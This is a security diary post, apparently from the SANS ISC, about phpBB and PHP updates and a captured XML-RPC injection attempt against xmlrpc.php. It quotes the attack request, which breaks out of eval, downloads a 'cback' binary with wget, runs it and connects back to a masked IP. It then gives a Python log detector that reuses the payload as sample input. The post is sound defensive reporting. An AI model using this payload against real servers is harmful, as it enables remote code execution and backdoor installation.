PHP and phpBB releases
We usually do not post news about software releases, but these two are rather important.
The first is the new release of phpBB. This bulletin board system is very common and was targeted by some Perl bots some time ago, due to a vulnerability in its code. So it is very important to keep up to date with the vendor.
The second is PHP itself. They just released version 4.4.1, and I would suggest keeping up to date on this one too...
Today we received a post about some Apache log entries showing attempts to exploit vulnerabilities in another PHP component, xmlrpc.php. The entry was this one:
POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269
<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>
This looks like they were targeting a vulnerability in xmlrpc.php. According to their website, the new release fixes some security vulnerabilities: "Note: all users are encouraged to upgrade to release 1.2 or later, since known exploits exist for earlier versions. All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
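The captured request is a good test case for spotting this kind of attempt in your own logs. The following script is an added example for this diary, not code from ISC or from the xmlrpc.php project: it inspects XML-RPC POST bodies for the injection pattern shown above (a quote that breaks out of the string argument handed to eval, PHP statements, a backtick shell command, and a trailing /* comment that hides the rest of the generated code). The sample input is constructed for the example; it reuses the body from the diary entry above (addresses masked as on the page) plus two benign XML-RPC calls, and the indicator names are my own.

```python
"""Flag XML-RPC POST bodies that carry the PHP/shell injection pattern seen above."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample input: the captured attack body from the diary plus two
# benign XML-RPC calls, one of which contains a lone apostrophe on purpose.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {
        "path": "/wordpress/xmlrpc.php",
        "body": """<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>""",
    },
    {
        "path": "/wordpress/xmlrpc.php",
        "body": '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>',
    },
    {
        "path": "/wordpress/xmlrpc.php",
        "body": '<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName>'
                "<params><param><value><string>it's a test</string></value></param></params></methodCall>",
    },
]

# Heuristics (my own naming) for the injection shape in the captured request.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # closes the quoted argument and the call that the library built around it
    "string_breakout": re.compile(r"'\s*,\s*''\s*\)\)\s*;"),
    # a PHP statement followed by an argument; the trailing char is required so
    # that method names like system.listMethods do not match
    "php_statement": re.compile(r"\b(echo|exit|system|passthru|shell_exec|eval)\s*[('`]"),
    # backtick operator: PHP runs the enclosed text as a shell command
    "backtick_shell": re.compile(r"`[^`]+`"),
    # fetch a file and mark it executable inside the same command string
    "download_and_execute": re.compile(r"\b(wget|curl)\b[^`]*\bchmod\s+\+x\b"),
    # opening comment that swallows whatever code follows the injected text
    "comment_tail": re.compile(r"/\*"),
}


@dataclass
class Finding:
    path: str
    method_name: str
    indicators: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A breakout on its own is decisive; otherwise require two indicators
        # so that a single apostrophe or the word "echo" does not raise an alert.
        return "string_breakout" in self.indicators or len(self.indicators) >= 2


def inspect_request(path: str, body: str) -> Finding:
    """Return which indicators match a single POST body."""
    m = re.search(r"<methodName>([^<]*)</methodName>", body)
    method = m.group(1) if m else ""
    hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
    return Finding(path=path, method_name=method, indicators=hits)


def scan(requests: List[Dict[str, str]]) -> List[Finding]:
    """Inspect every captured request and return one Finding per request."""
    return [inspect_request(r["path"], r["body"]) for r in requests]


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        verdict = "INJECTION" if f.suspicious else "ok"
        print(f"{verdict:9} {f.path} method={f.method_name!r} indicators={f.indicators}")
```

Run it against bodies reassembled from a full-request capture (Apache's access log alone does not keep POST bodies, so this needs mod_security, a proxy log or a packet capture). The two-indicator threshold is a deliberate trade-off: the breakout sequence alone is specific enough to alert on, while single keywords are too common in legitimate XML-RPC traffic.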
----------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)